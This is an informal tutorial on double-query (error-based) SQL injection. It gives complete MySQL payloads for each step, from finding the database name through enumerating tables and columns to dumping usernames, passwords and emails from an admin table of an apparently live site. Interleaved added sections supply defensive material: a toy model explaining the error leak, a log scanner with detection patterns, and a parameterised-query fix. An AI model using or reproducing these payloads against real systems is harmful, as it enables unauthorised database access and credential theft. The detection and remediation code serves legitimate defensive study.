hello friends, today we are going to look at double query based SQL injection

  • here is the url

  • now find the injection point
  • here is how I got the injection point

  • now the next step is to check whether we can extract the database using a union based query or not... but I don't get the details using union based injection

  • so now we can learn about double query based SQL injection

step 1: find the current database name

COMMAND: +and(select 1 FROM(select count(*),concat((select (select concat(database())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)


step 2: to find the user name use user(), and for the version use version()
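Why does wrapping the value in count(*), concat(..., floor(rand(0)*2)) and GROUP BY make the server hand it back? The answer is what tells a defender what to fix (never echo raw database errors to the client, and never let input reach the query as SQL text). The following is an added educational model, not code from the original post and not a MySQL client: it mimics the well-known behaviour that GROUP BY fills a temporary table keyed on the grouped expression and evaluates a non-deterministic expression twice per row, once to probe for the key and again when inserting it. The bit sequence is a constructed stand-in for floor(rand(0)*2), not MySQL's real output, and the error text is a stand-in for MySQL error 1062.

```python
"""Toy model of why the "double query" payload leaks data through an error.

Added educational example, not from the original post. No database is used;
the group-by temporary table is a dict and the "random" bits are constructed.
"""
from typing import Optional

# Constructed stand-in for successive values of floor(rand(0)*2).
CONSTRUCTED_RAND_BITS = [0, 1, 1, 0, 1, 1, 1, 0, 1, 1]


class DuplicateEntryError(Exception):
    """Stands in for MySQL error 1062 'Duplicate entry ... for key ...'."""


def simulate_group_by(leaked_value: str, rows: int,
                      bits: Optional[list] = None) -> dict:
    """Model `SELECT count(*), concat(<leaked>, floor(rand(0)*2)) x ... GROUP BY x`.

    Returns the finished group table (key -> count) when no error occurs and
    raises DuplicateEntryError carrying the key, i.e. the leaked value, when the
    key recomputed on insert collides with one that is already present.
    """
    bit_iter = iter(bits if bits is not None else CONSTRUCTED_RAND_BITS)
    groups: dict = {}
    for _ in range(rows):
        # Evaluation 1: build the key used to probe the temporary table.
        probe_key = f"{leaked_value}{next(bit_iter)}"
        if probe_key in groups:
            groups[probe_key] += 1
            continue
        # Evaluation 2: the key is recomputed when the new row is inserted,
        # so it may differ from the key that was just probed.
        insert_key = f"{leaked_value}{next(bit_iter)}"
        if insert_key in groups:
            raise DuplicateEntryError(
                f"Duplicate entry '{insert_key}' for key 'group_key'")
        groups[insert_key] = 1
    return groups


def leak_via_error(leaked_value: str, rows: int) -> Optional[str]:
    """Return the error text a verbose server would show, or None if no error."""
    try:
        simulate_group_by(leaked_value, rows)
    except DuplicateEntryError as err:
        return str(err)
    return None


if __name__ == "__main__":
    # With too few source rows the collision never happens; that is why the
    # payloads in the post select FROM information_schema.tables, which always
    # has many rows.
    print(leak_via_error("advance", 1))
    print(leak_via_error("advance", 3))
```

The model also shows why the leaked string ends up followed by a stray 0 or 1 in the real error message: it is the second evaluation of floor(rand(0)*2) glued onto the concat() output.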

  • you can get the list of database name using this command
+and(select 1 FROM(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT N,1)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)

in this command check for "LIMIT N,1"

you have to increment N from 0 up to the number of databases on that site

ex: I used limit 0,1

 --> limit 1,1

there are only two databases :-p

I can't increment further

this is how you get the list of databases
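The enumeration loop just described (same payload, LIMIT N,1 bumped one step at a time from one client, each request answered with a 500) is also a very recognisable pattern in web server logs. The following is an added example, not part of the original post: it scans constructed Apache-style access log lines, URL-decodes the request target, looks for the three components every payload in this write-up shares (floor(rand(0)*2), GROUP BY over the alias, information_schema) and pulls out the LIMIT N counter so a sequence of hits from one IP can be reported together. The log lines, IPs and paths are all constructed samples.

```python
"""Spot double-query (error-based) SQL injection attempts in access logs.

Added example, not from the original post. Log lines are constructed samples.
"""
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample log: one benign request, two enumeration steps, one
# unrelated client. Payload text is the post's step 2 payload with '+' for
# spaces, as it would appear in a request line.
CONSTRUCTED_LOG = """\
203.0.113.7 - - [10/Oct/2023:10:00:01 +0000] "GET /item.php?id=1 HTTP/1.1" 200 512
203.0.113.7 - - [10/Oct/2023:10:00:05 +0000] "GET /item.php?id=1+and(select+1+FROM(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(schema_name+as+char),0x27,0x7e)+FROM+information_schema.schemata+LIMIT+0,1))+FROM+information_schema.tables+LIMIT+0,1),floor(rand(0)*2))x+FROM+information_schema.tables+GROUP+BY+x)a) HTTP/1.1" 500 301
203.0.113.7 - - [10/Oct/2023:10:00:09 +0000] "GET /item.php?id=1+and(select+1+FROM(select+count(*),concat((select+(select+(SELECT+distinct+concat(0x7e,0x27,cast(schema_name+as+char),0x27,0x7e)+FROM+information_schema.schemata+LIMIT+1,1))+FROM+information_schema.tables+LIMIT+0,1),floor(rand(0)*2))x+FROM+information_schema.tables+GROUP+BY+x)a) HTTP/1.1" 500 301
198.51.100.20 - - [10/Oct/2023:10:00:12 +0000] "GET /item.php?id=2 HTTP/1.1" 200 498
"""

# Minimal combined-log parser: client IP, method, request target, status.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# All three must be present in the decoded, lower-cased target.
DOUBLE_QUERY_SIGNS = (
    re.compile(r"floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\)"),
    re.compile(r"group\s+by\s+\w+"),
    re.compile(r"information_schema\."),
)
# First LIMIT N,1 in the payload is the enumeration counter the post increments.
LIMIT_RE = re.compile(r"limit\s+(\d+)\s*,\s*1")


def classify_line(line: str):
    """Return a dict for a suspicious request, or None for benign/unparsable lines."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    decoded = unquote_plus(m.group("target")).lower()
    if not all(sig.search(decoded) for sig in DOUBLE_QUERY_SIGNS):
        return None
    lim = LIMIT_RE.search(decoded)
    return {
        "ip": m.group("ip"),
        "status": int(m.group("status")),
        "limit_index": int(lim.group(1)) if lim else None,
    }


def summarize(log_text: str) -> dict:
    """Map each offending client IP to the LIMIT counters it used, in order."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        info = classify_line(line)
        if info:
            hits[info["ip"]].append(info["limit_index"])
    return dict(hits)


if __name__ == "__main__":
    for ip, counters in summarize(CONSTRUCTED_LOG).items():
        print(f"{ip}: double-query payloads with LIMIT counters {counters}")
```

A run of consecutive counters from one address, paired with 500 responses, is the enumeration itself; a WAF or log rule keyed on the same three components blocks the whole family of payloads in this post rather than one string.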

step 3: now find the list of tables in the particular database

+and(select 1 FROM(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables WHERE table_schema=<HEX_VALUE_OF_DB_NAME> LIMIT N,1)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)

<HEX_VALUE_OF_DB_NAME> ---> here our database name is advance

the encoded value is CHAR(97, 100, 118, 97, 110, 99, 101) (the ASCII codes of advance)

like the previous step, you need to increment N to get the list of tables in that particular database

limit 1,1 gives the admin table :-p

step 4: the next step is to find the column names of the admin table

+and(select 1 FROM(select count(*),concat((select (select (select distinct concat(cast(column_name as char)) FROM information_schema.columns WHERE table_schema=<HEX_VALUE_OF_DB_NAME> AND table_name=<HEX_VALUE_OF_TABLE_NAME> LIMIT N,1)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)

<HEX_VALUE_OF_DB_NAME> -----> CHAR(97, 100, 118, 97, 110, 99, 101)
<HEX_VALUE_OF_TABLE_NAME> ---> CHAR(97, 100, 109, 105, 110)

as in the previous step, you need to increment N to get the list of column names

limit 0,1-->username1

limit 1,1-->password1

step 5: the last step is to dump the values :-p

+and+(select 1 FROM(select+count(*),concat((select+concat(0x3a,username,0x3a,password,0x3a,email,0x3a) FROM <TABLE_NAME>+LIMIT+0,1),floor(rand(0)*2))x FROM information_schema.tables+GROUP BY x)b)
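Every step above relies on one thing: the id parameter is glued into the SQL string, so whatever follows the number is parsed as SQL. The added example below is not code from the original post; it uses sqlite3 from the Python standard library with a constructed items table instead of the MySQL target in the post, and takes the step 2 payload verbatim (with spaces for +). The MySQL-only parts (information_schema, rand(0)) naturally fail in SQLite, and that failure is the demonstration: the string-built query tries to execute the attacker's subquery and dies with a database error, while the parameterised query compares the same text as a plain value and returns nothing. The table name, column names and rows are constructed.

```python
"""String-built SQL (the bug behind this post) next to the parameterised fix.

Added example, not from the original post. Uses an in-memory SQLite database
with a constructed table; the payload text is the post's step 2 payload.
"""
import sqlite3

# The post's step 2 payload, '+' replaced by spaces, exactly as it would arrive
# in the id parameter after URL decoding.
DOUBLE_QUERY_INPUT = (
    "1 and(select 1 FROM(select count(*),concat((select (select "
    "(SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) "
    "FROM information_schema.schemata LIMIT 0,1)) FROM information_schema.tables "
    "LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)"
)


def make_db() -> sqlite3.Connection:
    """Constructed sample data standing in for the target site's table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO items VALUES (?, ?)",
                     [(1, "first"), (2, "second")])
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, user_input: str) -> list:
    """The pattern that makes the post's attack possible: input spliced into SQL."""
    sql = "SELECT name FROM items WHERE id=" + user_input
    return conn.execute(sql).fetchall()


def lookup_parameterised(conn: sqlite3.Connection, user_input: str) -> list:
    """The fix: the driver binds the input as a value; it is never parsed as SQL."""
    return conn.execute("SELECT name FROM items WHERE id=?",
                        (user_input,)).fetchall()


def compare(user_input: str):
    """Return (what the vulnerable query did, what the parameterised query returned).

    The first element is ("rows", rows) or ("error", message) so the caller
    can see whether the database tried to run the injected SQL.
    """
    conn = make_db()
    try:
        vulnerable = ("rows", lookup_vulnerable(conn, user_input))
    except sqlite3.Error as err:
        vulnerable = ("error", str(err))
    safe = lookup_parameterised(conn, user_input)
    conn.close()
    return vulnerable, safe


if __name__ == "__main__":
    print("normal input:   ", compare("1"))
    print("payload input:  ", compare(DOUBLE_QUERY_INPUT))
```

The exact SQLite error text depends on which unsupported part of the payload the parser reaches first, so the test only checks that an error was raised; on the post's MySQL target the same string-built query would instead run the subquery and, with verbose errors enabled, print the leaked value. Binding the parameter, plus returning a generic error page instead of the database message, removes both halves of the technique.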

